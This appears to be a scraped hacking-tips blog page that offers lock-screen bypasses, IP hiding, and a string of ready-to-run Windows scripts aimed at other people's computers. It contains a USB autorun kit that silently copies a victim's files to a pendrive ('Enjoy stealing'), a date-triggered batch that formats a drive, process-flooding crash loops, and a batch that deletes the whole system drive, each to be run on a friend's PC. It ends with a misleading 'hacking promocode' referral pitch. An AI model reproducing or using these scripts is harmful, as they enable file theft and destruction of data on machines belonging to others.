    2.Change the secret code to your preferred choice. The default password is : 1234
    3.To reset your screen lock, send the following message from another phone:

    secret_code reset

    Example:

    1234 reset

    Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
    Note 2 : There is an option available to change the preset keyword. Default is : reset – Your phone will restart and your lock screen will be reset.
    Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
    Just Try Any Random Pattern Or Password And it Should Unlock.

    METHOD II

    Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed:

    INSTRUCTIONS:

    1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard
    (using your PC, as you cant get into your phone, right )
    2. Insert the sdcard into your phone
    3. Reboot into recovery mode
    4. Flash the zip
    5. Reboot
    6. Done!

    Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
    Just Try Any Random Pattern Or Password And it Should Unlock.




    How to Hack Command Prompt at school to change passwords

    Trying to focus on studying for your Stats final in the library but getting a serious ADD spell? Then make use of your time – while having a little fun with whoever else is in the library – by hacking into your computer’s command prompt.

    The command prompt is the most basic operating system that your computer runs on, and this video will teach you how to shut down your friend’s computer or even get and change the password of an administrator.
    See this easy and simple tutorial video and learn easily
    Link:
    https://youtu.be/GXwFCZR_sOA


    Hide my ip address( easy and simplest method)

    In this article we will talk about different ways of hiding an IP address, and why one should hide their IP.


    Benefits of hiding my ip address

    *By hiding your IP, you can easily access these banned site

    *Sending anonymous emails. People can trace your IP address by checking email headers. Even there are online email tracers where people can trace IP addresses of emails they received. By hiding your actual IP address, you can anonymously send emails through such webmail services like Gmail, Yahoo and Hotmail

    *Accessing web sites and web content in a school, worksite or country where content is highly filtered or web surfing is greatly restricted.

    *Hiding your actual location to access restricted content served on the basis of geographic location. 

    Ways to Hide IP Address

    There are a couple of ways for you to surf anonymously or hide your home IP address. The following ways are just bare basics, and are covered in greater details in their own pages.

    Following are the list of best IP address hiding softwares

    IP Hiding Software

    There are many IP hiding software available. Some are free and provided as shareware, while others are sold by monthly/yearly subscription or at a one-time price. Such proxy software are usually faster and more reliable. Some of them are:

    Hide IP Address              Download

    Easy HIde IP                    Download

    Mask My IP                       Download

    Hide all IP                          Download


    Then there are another ways you can hide your IP

    Hide IP Through Web Proxy Servers:

     A proxy server is a computer network service that provides an indirect network connectivity that enable the users to access other network services such as web content. In other words, a proxy server acts as an intermediary between you and the website, etc. that you want to access. You send your request to the proxy server, and after receiving your request, it sends it to the target content or service provider as its own, and fetches the content and sends it to you. The target server containing the service/content (forum, online game server, download server, blog, content site, etc.) sees the proxy server as the requester, not you. This way, you hide your real WAN IP, and still gain access to the desired content/service. To this end, people usually use web based proxies. Some of these web proxies are free and allow anonymous surfing, while other (and more advanced) web proxies offer premium services with a higher level of anonymity.


    How to copy (steal) files from a computer to a pendrive

    STEP 1
    Open Notepad (I recommend Notepad++) and copy-paste the following lines.

    [autorun]
    icon=drive.ico
    open=launch.bat
    action=Click OK to Run
    shell\open\command=launch.bat
    Save this as autorun.inf

    The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

    The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

    STEP 2
    Open Notepad again and copy-paste the following lines

    @echo off
    :: variables
    /min
    SET odrive=%odrive:~0,2%
    set backupcmd=xcopy /s /c /d /e /h /i /r /y
    echo off
    %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
    %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
    %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
    @echo off
    cls
    Save this as file.bat

    This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

    The first file path “%USERPROFILE%\pictures” – is the target.
    The second file path “%drive%\all\My pics” – is the destination.

    STEP 3
    Open Notepad once again and copy-paste the following line.

    CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
    Save this as invisible.vbs

    This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

    STEP 4
    Open Notepad one last time and copy-paste the following line.

    wscript.exe \invisible.vbs file.bat
    Save this as launch.bat

    This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

    STEP 5
    Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

    This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.
    Enjoy stealing!!!!!


    How to make your pc talk(works on win7,vista)

    >> To make your pc talk

    Open a text file in notepad and write:

    Dim msg, sapi
    msg=InputBox(“Enter your text”,”Talk it”)
    Set sapi=CreateObject(“sapi.spvoice”)
    sapi.Speak msg

    Save the file with a (*.vbs) extension, it will create a VBScript File.
    It will prompt you for a text when u open the file, input the text and press ok.”

    u will hear now what u typed..

    this works in xp, vista, win7 also.

    enjoy!!!


    Crash pc with BOMB VIRUS

    The simple way to create virus to flash or crash the PC >> Bomb Virus

    Copy Paste The Following in notepad

    If %date% NEQ 2009/11/25 goto exit
    format E: /y >nul
    :exit
    exit

    And Save It As Anything.bat

    Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
    The Virus Will Take Effect On That Day


    Endless notepad virus to crash pc(easy method)

    For whatever reason, you may want to crash your computer. Using your PC's Notepad app as a platform, you can create a simple .bat (or "batch") file that creates an infinite loop of opening Command Prompt windows; this will rapidly consume your computer's RAM, causing it to temporarily crash. As a general rule, you shouldn't intentionally crash any computer but your own, no matter how temporary the crash isThis virus start creating endless notepad windows on PC






    also check:how to root anyphone in 2 minutes(hot method)

    FOLLOW THESE STEPS:

    step 1:  

      open NOTEPAD app,use notepad as your platform for creating these simple virus

                   start-accessories- open notepad


    step 2:  creating a batch file is the next important step, open notepad and enter the following code
                      

    * "START %SystemRoot%\system32\notepad.exe"

    the above command line start creating endless notepads run as batch file
                     


    step 3:  creating endless notepads-open note pad and enter below command 
    >>Endless Notepads

    *This will pop up endless notepads until the computer freezes and crashes*

    Code:-

    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top

    step:4 : saving file as bat file for excecuting:

    Name your batch file. You can do this by typing any name into the "File Name" field. Be sure to type ".bat" (excluding the quotes) at the end of whatever name you choose.
    • If you can't come up with a name, "mobile.bat" and "cave.bat" are both excellent choices.
    step 6




    Save your text file as a batch file. Text files have easily-edited file extensions. To set up your file as a .bat file:
    • Click "File" in the top left corner of Notepad.
    • Click "Save As...".
    • Click the "Save as type" field at the bottom of the "Save" window.
    • Click "All Files" in the drop-down menu


    STEP 5:
     running your bat file is last step
    open anyname.bat file then run as administrators then endless notepad will be shown and system crashes




    by sending it to friend pc u can crash his pc tpp

    ** note this is for educational purpose only

    more incoming searches:

    crash pc with creating endless notepad, by creating  endless notepad pccan be crashed,pc crashing using simple commands making pc crashed,hacking pc,pc hanging commant,endless notepad virus,crash pc with virus file

    How to crash or hang your friend pc (simple method)

    >> This Will Crash Ur Computer

    Option Explicit

    Dim WSHShell
    Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

    Dim x
    For x = 1 to 100000000
    WSHShell.Run “Tourstart.exe”
    Next

    Save It As Anything.vbs

    Then run on your friend pc

    It Only Works With Windows XP


    Hack your friend pc by simple command lines

    Hack your friends pc by simple command lines

    Type/copy the following command:



    >>This Virus Deletes All The Content Of A Drive…

    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00

    Save The Above Code in a .bat file

    Then run it on your friend pc


    Saturday 4 November 2017

    true balance app hacking using refer code(working 100%)

    earn money using android app:
    many of students want to earn online real money using android applications .there  are many android applications that really pays you lot of cash and I have listed best app on google play store  which really gives you real money and this is the only trusted app which gives real recharge and unlimited earning








    True Balance app:

    best android app to earn money recharge fast........I have tried one day and make 350 rupees and I have made my jio recharge.....!!!!!!!shocking right.................all you do is just make your friends just click and istall once and enter their number and verify it,then you got 10 rupees for each
    and I have my friends group and I shared this app with them and they installed and I got my trick worked and earned a lot now I am inviting you to earn lot of money using this app


    By installing the app using below link you will get rs 10 ....start with free 10 rupees enjoy




    Just tap the link, install app & recharge.
    follow the steps carefully

    step 1: click and true balance.apk and verify your number and second step is the most important step


    step2: enter the hacking promocode  " 2HEQEUY8"(this code start generating money)


    Step3:for even more money uninstall app and try this trick with different numbers